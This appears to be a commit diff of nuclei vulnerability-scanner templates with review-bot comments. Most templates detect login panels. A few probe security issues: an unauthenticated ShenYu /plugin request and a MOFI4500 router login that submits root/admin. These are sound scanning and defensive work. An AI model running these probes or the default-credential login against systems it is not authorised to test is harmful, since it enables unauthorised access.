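Review bot: the second request creates a persistent vehicle record ("Test", with the script payload in `vehicalorcview`) on the target, so this stored-XSS check leaves data behind on every scan. Mark it with the `intrusive` tag alongside `authenticated` and say so in the description, so users running the default tag set are not surprised by the side effect.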
@ -4,7 +4,7 @@ info:
|
|||
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
|
||||
author: hexcat
|
||||
severity: high
|
||||
description: WordPress Email Template Designer – WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
|
||||
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
|
||||
reference:
|
||||
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
|
||||
- https://wordpress.org/plugins/wp-html-mail/
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2022-23944
|
||||
|
||||
info:
|
||||
name: ShenYu Admin Unauth Access
|
||||
author: cckuakilong
|
||||
severity: medium
|
||||
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
|
||||
reference:
|
||||
- https://github.com/apache/incubator-shenyu/pull/2462/files
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
|
||||
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
|
||||
classification:
|
||||
cve-id: CVE-2022-23944
|
||||
cwe-id: CWE-862
|
||||
tags: cve,cve2022,shenyu,unauth,apache
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"message":"query success"'
|
||||
- '"code":200'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
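Review bot: the author is given as `cckuakilong`, but the same contributor appears as `cckuailong` in CVE-2021-46005 above and in the reference URL `https://github.com/cckuailong/reapoc/...`; looks like a transposition, suggest `author: cckuailong`.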
@ -0,0 +1,33 @@
|
|||
id: mofi4500-default-login
|
||||
|
||||
info:
|
||||
name: MOFI4500-4GXeLTE-V2 Default Login
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
tags: mofi,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/luci/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=root&password=admin
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- root
|
||||
password:
|
||||
- admin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "MOFI4500 - General - LuCI"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
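Review bot: the raw body is `username=root&password=admin` with literal values, so the `payloads` block and `attack: pitchfork` never take effect; nuclei substitutes `{{username}}` and `{{password}}` only where those placeholders appear. Either change the body to `username={{username}}&password={{password}}` or remove the unused `attack`/`payloads` section. A `reference` or `description` naming the device and the factory credential would also help users triage the finding.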
@ -0,0 +1,28 @@
|
|||
id: bigbluebutton-login
|
||||
|
||||
info:
|
||||
name: BigBlueButton Login Panel
|
||||
author: myztique
|
||||
severity: info
|
||||
reference: https://github.com/bigbluebutton/greenlight
|
||||
tags: panel,bigbluebutton
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'content="BigBlueButton'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: version
|
||||
group: 1
|
||||
regex:
|
||||
- 'Greenlight<\/a>\. (.*)'
|
|
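Review bot: `matchers-condition: and` has only one matcher beneath it; either drop it or add the `status: 200` matcher the other panel templates in this commit use, otherwise an error page that echoes the string would also match. The version extractor `Greenlight<\/a>\. (.*)` is greedy and will capture everything to the end of the line; anchoring it to the version token (for example `\. ([0-9.]+)`) gives a cleaner `version` value.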
@ -0,0 +1,24 @@
|
|||
id: flightpath-panel
|
||||
info:
|
||||
name: FlightPath Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"flightpath"
|
||||
tags: panel,flightpath
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Login | FlightPath</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: jamf-panel
|
||||
|
||||
info:
|
||||
name: JAMF MDM Panel
|
||||
author: pdteam
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:1262005940
|
||||
tags: jamf,panel,mdm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: all
|
||||
words:
|
||||
- "Jamf Pro Login"
|
||||
- "Jamf Cloud Node"
|
||||
condition: or
|
|
@ -1,7 +1,7 @@
|
|||
id: joomla-panel
|
||||
|
||||
info:
|
||||
name: Joomla Panel
|
||||
name: Joomla! Panel
|
||||
author: its0x08
|
||||
severity: info
|
||||
tags: panel,joomla
|
||||
|
@ -16,3 +16,5 @@ requests:
|
|||
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
|
||||
- '/administrator/templates/isis/images/joomla.png'
|
||||
condition: or
|
||||
|
||||
# Enhanced by cs on 2022/01/28
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: netdata-dashboard-detect
|
||||
info:
|
||||
name: NetData Dashboard Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-dork: 'Server: NetData Embedded HTTP Server'
|
||||
tags: netdata,panel,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>netdata dashboard</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
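Review bot: the metadata key is `shodan-dork` here while every other template in this commit uses `shodan-query` (for example `shodan-query: http.title:"flightpath"`); use `shodan-query` so the indexer and `-tags` tooling see it. The tag list also mixes `panel` and `tech`; the other panels here use `panel,<product>,login`.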
@ -1,10 +1,12 @@
|
|||
id: openam-detect
|
||||
id: openam-panel
|
||||
|
||||
info:
|
||||
name: Detect OpenAM and OpenSSO
|
||||
name: OpenAM and OpenSSO Login Panel
|
||||
author: philippedelteil
|
||||
severity: info
|
||||
tags: tech,openam
|
||||
metadata:
|
||||
shodan-query: http.title:"OpenAM"
|
||||
tags: panel,openam,opensso,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -16,6 +18,7 @@ requests:
|
|||
- "{{BaseURL}}/sso/XUI"
|
||||
- "{{BaseURL}}/sso/UI"
|
||||
- "{{BaseURL}}/sso/UI/#login"
|
||||
- "{{BaseURL}}/opensso/UI/Login"
|
||||
- "{{BaseURL}}/openam/UI/login"
|
||||
- "{{BaseURL}}/openam/UI/#loginlogin"
|
||||
- "{{BaseURL}}/openam/UI/Login"
|
|
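Review bot: the paths `{{BaseURL}}/sso/UI/#login` and `{{BaseURL}}/openam/UI/#loginlogin` include URL fragments, which are never sent to the server, so on the wire they duplicate `/sso/UI` and `/openam/UI/`; `#loginlogin` also looks like a typo. Drop the fragment entries and keep `/openam/UI/login` and `/openam/UI/Login`, which do differ for case-sensitive servers.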
@ -0,0 +1,28 @@
|
|||
id: openbmcs-detect
|
||||
|
||||
info:
|
||||
name: openbmcs-detect
|
||||
author: ffffffff0x
|
||||
severity: info
|
||||
tags: openbmcs,detect
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'BMS - Login'
|
||||
- 'Copyright all rights reserved by Open BMCS'
|
||||
- 'OpenBMCS does not support Internet Explorer'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
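Review bot: `name: openbmcs-detect` repeats the id instead of a human-readable name, and `tags: openbmcs,detect` does not follow the `panel,<product>,login` convention the rest of this commit applies to login pages (`BMS - Login` is one of the matched strings). Suggest `name: OpenBMCS Login Panel` and `tags: panel,openbmcs,login`.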
@ -1,10 +1,12 @@
|
|||
id: opensis-detect
|
||||
|
||||
info:
|
||||
name: OpenSIS Detect
|
||||
name: OpenSIS Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,opensis
|
||||
metadata:
|
||||
shodan-query: http.title:"openSIS"
|
||||
tags: panel,opensis,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -12,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/opensis/index.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
|
@ -1,10 +1,12 @@
|
|||
id: openx-detect
|
||||
id: openx-panel
|
||||
|
||||
info:
|
||||
name: OpenX detect
|
||||
name: OpenX Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,openx
|
||||
metadata:
|
||||
shodan-query: http.title:"OpenX"
|
||||
tags: panel,openx,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,22 +1,29 @@
|
|||
id: phpcollab-detect
|
||||
id: phpcollab-panel
|
||||
|
||||
info:
|
||||
name: PhpCollab detect
|
||||
name: PhpCollab Login Panel
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: tech,phpcollab
|
||||
metadata:
|
||||
shodan-query: http.title:"PhpCollab"
|
||||
tags: panel,phpcollab,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/general/login.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>PhpCollab</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
|
@ -1,10 +1,12 @@
|
|||
id: remkon-manager-detect
|
||||
id: remkon-manager-panel
|
||||
|
||||
info:
|
||||
name: Remkon Device Manager Detect
|
||||
author: pikpikcu
|
||||
name: Remkon Device Manager Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: remkon,tech,panel
|
||||
metadata:
|
||||
shodan-query: http.title:"Remkon Device Manager"
|
||||
tags: panel,remkon,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,10 +1,12 @@
|
|||
id: sage-detect
|
||||
id: sage-panel
|
||||
|
||||
info:
|
||||
name: Sage X3 Detect
|
||||
author: pikpikcu
|
||||
name: Sage X3 Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: tech,sage
|
||||
metadata:
|
||||
shodan-query: http.title:"Sage X3"
|
||||
tags: panel,sage,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -13,11 +15,12 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Sage X3</title>"
|
||||
- "'/auth/sage-id/registerStart'"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
|
@ -0,0 +1,31 @@
|
|||
id: seeddms-panel
|
||||
|
||||
info:
|
||||
name: SeedDMS Login Panel
|
||||
author: pussycat0x,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"SeedDMS"
|
||||
tags: panel,seeddms,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
|
||||
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,9 +1,10 @@
|
|||
id: strapi-documentation
|
||||
|
||||
info:
|
||||
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
|
||||
name: Strapi Documentation
|
||||
author: idealphase
|
||||
severity: info
|
||||
description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
|
||||
tags: strapi,panel
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: threatq-login
|
||||
|
||||
info:
|
||||
name: ThreatQ login panel
|
||||
author: idealphase
|
||||
severity: info
|
||||
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
|
||||
reference: https://www.threatq.com/threat-intelligence-platform/
|
||||
tags: panel,threatq
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
|
||||
- '<script src="/assets/js/threatq.min.js'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<script src="/assets/js/threatq.min.js\?(.*)'
|
|
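Review bot: the extractor regex `<script src="/assets/js/threatq.min.js\?(.*)` is greedy and captures the rest of the line, including the closing quote and tag, rather than the cache-buster/version token; `\?([^"]+)"` captures just the value. The extractor also has no `name`, so the output is unlabelled. The description is vendor marketing copy ("open and extensible threat intelligence platform ..."); a one-line statement that the ThreatQ login page was detected is enough for an `info` panel template.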
@ -0,0 +1,26 @@
|
|||
id: typo3-login
|
||||
|
||||
info:
|
||||
name: TYPO3 Login Detect
|
||||
author: dadevel
|
||||
severity: info
|
||||
tags: panel,typo3
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/typo3/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "TYPO3 CMS"
|
||||
- "typo3-login-form"
|
||||
- "TYPO3 SVN ID:"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
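Review bot: the name `TYPO3 Login Detect` does not match the `... Login Panel` naming the other `panel`-tagged templates in this commit use; suggest `name: TYPO3 Login Panel`. The word `TYPO3 CMS` alone is broad enough to match front-end pages that mention the product, so consider making `typo3-login-form` the required match and keeping the others as `or` alternatives only if `/typo3/` actually returns them.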
@ -0,0 +1,26 @@
|
|||
id: voipmonitor-panel
|
||||
|
||||
info:
|
||||
name: VoipMonitor panel
|
||||
author: Yanyun
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"VoIPmonitor"
|
||||
tags: panel,voipmonitor,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "appShareUrl = 'share.voipmonitor.org'"
|
||||
- "VoIPmonitor"
|
||||
condition: and
|
|
@ -0,0 +1,33 @@
|
|||
id: wallix-accessmanager-panel
|
||||
|
||||
info:
|
||||
name: Wallix Access Manager Panel
|
||||
author: righettod
|
||||
severity: info
|
||||
reference: https://www.wallix.com/privileged-access-management/access-manager/
|
||||
metadata:
|
||||
shodan-query: http.title:"Wallix Access Manager"
|
||||
tags: panel,wallix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wabam'
|
||||
- '{{BaseURL}}/wabam/favicon.ico'
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200"
|
||||
- "contains(tolower(body), '<title>wallix access manager</title>')"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200"
|
||||
- "('1745235488' == mmh3(base64_py(body)))"
|
||||
condition: and
|
|
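Review bot: the second dsl matcher compares `mmh3(base64_py(body))` against the literal `'1745235488'` with no record of where that favicon hash comes from; add it to `metadata` as `shodan-query: http.favicon.hash:1745235488` (the jamf template in this commit does exactly that) so reviewers can verify it and users can pivot on it.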
@ -0,0 +1,37 @@
|
|||
id: wazuh-panel
|
||||
|
||||
info:
|
||||
name: Wazuh Login Panel
|
||||
author: cyllective,daffainfo
|
||||
severity: info
|
||||
description: Wazuh - The Open Source Security Platform
|
||||
reference: https://github.com/wazuh/wazuh
|
||||
metadata:
|
||||
shodan-query: http.title:"Wazuh"
|
||||
tags: panel,wazuh,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app/login"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":"wazuh"'
|
||||
- '"title":"Wazuh"'
|
||||
- '"icon":"plugins/wazuh/img/icon_blue.png"'
|
||||
- '"url":"/app/wazuh"'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"version":"([0-9.]+)"'
|
|
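Review bot: `matchers-condition` is missing, and nuclei defaults it to `or`, so the `status: 200` matcher alone satisfies the template and any site returning 200 for `/app/login` will be reported as a Wazuh panel. Add `matchers-condition: and` before `matchers:`, as the other panel templates in this commit do.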
@ -0,0 +1,32 @@
|
|||
id: webmodule-ee-panel
|
||||
|
||||
info:
|
||||
name: Webmodule Login Panel
|
||||
author: pussycat0x,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
|
||||
reference: https://www.exploit-db.com/ghdb/7001
|
||||
tags: panel,webmodule-ee,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webmodule-ee/login.seam"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Webmodule</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'Version: ([0-9.]+)'
|
|
@ -0,0 +1,30 @@
id: xxljob-panel

info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login

requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"

- type: status
status:
- 200

extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'
@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel

info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login

requests:
- method: GET
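Review bot: the `id` changes from `yzmcms-detect` to `yzmcms-panel` and the `tech` tag is dropped, so anyone running `-id yzmcms-detect` or excluding it by id silently loses the template; if this is a rename rather than a new template, say so in the changelog so the old id is not reused for something else.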
@ -13,11 +15,13 @@ requests:

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or

- type: status
status:
- 200
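Review bot: moving the status matcher below the word matcher changes nothing functionally, but the words themselves (`Powered By <a href="http://www.yzmcms.com"` and `Powered By YzmCMS`) are the public front-end footer, not anything specific to a login page, so with the template now tagged `panel,yzmcms,login` it will flag every YzmCMS site as an exposed panel; either match a string only the admin login page emits or keep the `tech` tag.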
@ -0,0 +1,32 @@
id: zblogphp-panel

info:
name: Z-BlogPHP Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Z-BlogPHP"
tags: panel,zblogphp

requests:
- method: GET
path:
- "{{BaseURL}}"

matchers-condition: and
matchers:
- type: word
part: body
words:
- '<meta name="generator" content="Z-BlogPHP'

- type: status
status:
- 200

extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'
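Review bot: the request hits `{{BaseURL}}` and matches the `<meta name="generator" content="Z-BlogPHP` tag of the public site, which is a technology fingerprint, not a panel, yet the file is tagged `panel,zblogphp`; either retag it as a tech detection or point `path:` at the admin login page. The extractor's class `[:A-Z-a-z 0-9.]+` does work (the middle `-` is parsed as a literal hyphen), but `[A-Za-z0-9 .:-]+` expresses the same thing without making the reader check the regex grammar.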
@ -2,9 +2,11 @@ id: manageengine-servicedesk

info:
name: ZOHO ManageEngine ServiceDesk
author: dhiyaneshDK
author: dhiyaneshDK,righettod
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
reference:
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
tags: panel,zoho,manageengine

requests:
@ -17,6 +19,7 @@ requests:
- type: word
words:
- '<title>ManageEngine ServiceDesk Plus</title>'
- '<title>ManageEngine ServiceDesk Plus - MSP</title>'

- type: status
status:
@ -1,7 +1,7 @@
id: honeywell-scada-config

info:
name: Honeywell Scada System – Information Disclosure
name: Honeywell Scada System Information Disclosure
author: alperenkesk
severity: low
reference: https://www.exploit-db.com/exploits/44734
@ -22,4 +22,4 @@ requests:

- type: status
status:
- 200
- 200
@ -27,7 +27,7 @@ file:
- type: regex
# Investigate for possible SQL Injection
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array(‘$user_id’));
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id'));
regex:
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
- type: regex
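Review bot: the comment fix is right (the curly quotes would never appear in real PHP), but the regex right below it, `(?i)getone|getrow|getall|getcol|getassoc|execute|replace`, is an unanchored alternation: `replace` matches `str_replace` and `preg_replace`, and `execute` matches every PDO or mysqli prepared-statement call, so nearly every PHP file in a codebase will trigger this matcher and the SQL-injection hint the comment describes loses its signal. Anchoring on the ADOdb call shape, e.g. `->(?i:getone|getrow|getall|getcol|getassoc|execute|replace)\s*\(`, keeps the stated intent.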
@ -4,7 +4,7 @@ info:
name: AddEventlistener detection
author: yavolo
severity: info
tags: xss
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source

requests:
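Review bot: adding `misc` to `tags: xss,misc` is reasonable, since the matcher in this file only looks for the literal `window.addEventListener(` and performs no check on the message origin, but that also means `xss` overstates what a hit is; consider dropping `xss` or stating in a `description` that this is a lead for manual DOM review of web-message handlers rather than an XSS finding.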
@ -14,6 +14,6 @@ requests:

matchers:
- type: word
part: body
words:
- 'window.addEventListener('
part: body
@ -4,7 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
tags: misc,apple

requests:
- method: GET
@ -17,17 +17,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and

- type: word
part: header
words:
- 'application/json'
part: header

- type: status
status:
@ -11,6 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"

matchers:
- type: word
words:
@ -18,3 +19,4 @@ requests:
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
condition: or
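Review bot: `"Directory: /"` is a much weaker token than the two existing ones and is joined to them with `condition: or`, while the matcher block above has no `part:`, no `matchers-condition` and no status check, so any page that merely contains the text `Directory: /` (help text, a README rendered on the homepage) will be reported as a directory listing; anchor the new token to the markup it comes from (the `<title>` or heading it appears in) or pair it with a status matcher.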
@ -1,20 +0,0 @@
id: display-via-header

info:
name: Display Via Header
author: geeknik
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
severity: info
tags: misc,generic

requests:
- method: GET
path:
- "{{BaseURL}}"

redirects: true
extractors:
- type: regex
part: header
regex:
- "Via:.*"
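Review bot: removing this file is defensible, since it had no `matchers:` at all and with `redirects: true` it reported every `Via:` header seen anywhere along a redirect chain, but the commit should record why so the id `display-via-header` is not re-submitted later; if the header is still wanted for fingerprinting intermediate proxies, fold the `Via:.*` extractor into a template that has a matcher.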
@ -16,14 +16,14 @@ requests:
matchers:
- type: word
words:
- "# @package Joomla"
- "Joomla"
- "Open Source Matters. All rights reserved"
condition: and

- type: word
part: header
words:
- "text/plain"
part: header

- type: status
status:
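Review bot: the `part: header` move is cosmetic, but while this matcher is being touched, `- "Joomla"` in the first word block is redundant under `condition: and` because `- "# @package Joomla"` already contains it; dropping it makes the AND set easier to read without changing what matches.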
@ -21,9 +21,9 @@ requests:
condition: and

- type: word
part: header
words:
- "application/xml"
part: header

- type: status
status:
@ -22,9 +22,9 @@ requests:
condition: and

- type: word
part: header
words:
- "text/plain"
part: header

- type: status
status:
@ -14,7 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=

threads: 50
threads: 10
payloads:
path:
- /
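Review bot: lowering `threads: 50` to `threads: 10` is sensible for an NTLM type-1 probe, since every request forces the server into an authentication handshake, but `threads` only governs the concurrency of the `payloads` fan-out, so its effect is bounded by how many `path` values follow `- /`; if that list is short, the real rate control belongs in the CLI `-rate-limit` rather than in this file.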
@ -16,9 +16,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '2022'
part: body
negative: true

- type: regex
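Review bot: `- '2022'` with `negative: true` hardcodes the current year, so this template starts reporting every site as stale on 1 January 2023 until someone edits it; a year-agnostic version needs a `dsl` matcher that compares the extracted year with the date at run time rather than a literal, and failing that the file should carry a comment saying the literal must be bumped every January.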
@ -28,10 +28,10 @@ requests:
- '© [1-9]\d*'
- '© [1-9]\d*'
- '© [1-9]\d*'

extractors:
- type: regex
part: body
name: copyright_year
regex:
- 'Copyright [1-9]\d*'
- '© [1-9]\d*'
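Review bot: the three `© [1-9]\d*` lines look identical once rendered, so this hunk is presumably normalizing the byte encoding of `©`; say so in the commit message, because a reviewer cannot tell a no-op from an encoding fix here. Separately, `[1-9]\d*` also accepts `© 2` or `© 20`, so `[1-9]\d{3}` would tie both the matcher and the `copyright_year` extractor to a four-digit year.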
@ -1,7 +1,7 @@
id: detect-options-method
id: options-method

info:
name: Detect enabled OPTIONS methods
name: Allowed Options Method
author: pdteam
severity: info
tags: misc,generic
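Review bot: renaming `id: detect-options-method` to `options-method` breaks any `-id`, `-exclude-id` or reporting filter that used the old id; if the rename is deliberate, list it under renamed templates in the changelog rather than leaving users to discover it.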
@ -9,6 +9,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/robots.txt"

matchers-condition: and
redirects: true
matchers:
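Review bot: `redirects: true` is added without a `max-redirects`, so nuclei follows redirects up to its default cap and will happily land on a different host; a `/robots.txt` that 302s to a CDN or a parked domain then gets attributed to the scanned target. Set `max-redirects` to a small value (the security.txt template in this same change uses 2) and keep the `text/plain` and `Disallow:` checks that follow, since they are what stops a redirect to the homepage from matching.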
@ -17,9 +18,9 @@ requests:
- "Disallow:"

- type: word
part: header
words:
- text/plain
part: header

- type: dsl
dsl:
@ -10,20 +10,28 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/security.txt"
- "{{BaseURL}}/security.txt"
- "{{RootURL}}/.well-known/security.txt"
- "{{RootURL}}/security.txt"

stop-at-first-match: true
redirects: true
max-redirects: 3
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "Contact:"
condition: and

- type: dsl
dsl:
- "len(body) <= 1024 && len(body) > 0"
condition: and

extractors:
- type: regex
group: 1
regex:
- '(?mi)Contact:(.*)'
